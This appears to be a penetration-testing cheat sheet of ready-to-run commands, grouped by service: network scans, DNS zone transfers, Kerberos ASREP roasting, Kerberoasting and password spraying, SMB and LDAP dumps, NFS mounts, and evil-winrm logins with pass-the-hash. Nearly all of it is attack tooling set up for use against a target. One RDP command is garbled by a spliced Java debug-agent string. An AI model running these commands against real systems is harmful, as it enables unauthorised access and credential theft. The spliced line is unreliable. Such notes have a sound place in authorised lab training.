NMAP Scan
#Initial Scan
nmap -sn <IP>.0/24
nmap -p- --min-rate 1000 -T4 <IP>
sudo nmap -sU --top-ports 100 <IP>
#Full Scan
nmap -sC -sV -p<PORTS> <IP> -oN nmap.txt
#Other Scans
nmap -A <IP>
nmap -script vuln <IP>
#-iL for lists
#List Nmap Scripts
ls /usr/share/nmap/scripts/
FTP (21)
ftp anonymous@<IP>
ls
get <FILE>
put <FILE>
SSH (22)
ssh <USER>@<IP>
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null anonymous@<IP>
DNS (53)
#Zone Transfer
dig axfr @<DNS-IP> <domain>
#Reverse Lookup
dig -x <IP>
dnsrecon -d <domain>
nslookup <domain>
host <domain>
Kerberos (88)
nmap -p88 --script krb5-enum-users <IP>
#ASREP Roasting
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <IP> -request
#Kerberoasting
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user>
kerbrute
#User enumeration
kerbrute userenum -d <domain> --dc <IP> users.txt -v
#Password Spraying
kerbrute passwordspray -d <domain> --dc <IP> <Users List> Password123
RPC (135)
rpcclient
rpcclient -U '' -N <IP>
#rpcclient commands
enumdomusers
enumdomgroups
queryuser <RID>
SMB (139,445)
SMBClient
nmap --script smb-enum-shares,smb-enum-users -p139,445 <IP>
#List Shares
smbclient -N -L //<IP>
smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> --user <USER> --password <PASS>
smbclient //<IP>/<SHARE> -N -c "recurse;ls" #Download Recursive
get <FILE>
put <FILE>
NXC
nxc smb <IP> -u <USER> -p <PASS> --shares
nxc smb <IP> --users
LDAP (389)
ldapdomaindump
ldapdomaindump ldap://<IP> -u '<domain>\<user>' -p '<pass>'
ldapsearch
ldapsearch -H ldap://<IP> -x -b"DC=vault,DC=offsec" > ldap_dump.txt
#Anonymous
ldapsearch -x -H ldap://<IP> -s base namingcontexts
#Dump Users
ldapsearch -x -H ldap://<IP> -b "DC=vault,DC=offsec" "(objectClass=user)"
#Dump Computers
ldapsearch -x -H ldap://<IP> -b "DC=vault,DC=offsec" "(objectClass=computer)"
#Dump Groups
ldapsearch -x -H ldap://<IP> -b "DC=vault,DC=offsec" "(objectClass=group)"
NFS (2049)
showmount -e <IP>
mount -t nfs <IP>:/share /mnt
RDP (3389)
xfreerdp3 /v:<IP> /u:<USER> /p:'<PASS>' /dynamic-resolution /drive:parrot,/home/parrot/Desktop/temp /cert-ignore
xfreerdp3 /cert:ign
et,server=y,suspend=n,address=*:5005ore /v:192.168.196.113 /u:student /p:lab +dynamic-resolution
#/pth:<HASH>
WinRM (5985/5986)
evil-winrm -i <IP> -u <USER> -p <PASS>
evil-winrm -i <IP> -u <USER> -H <HASH>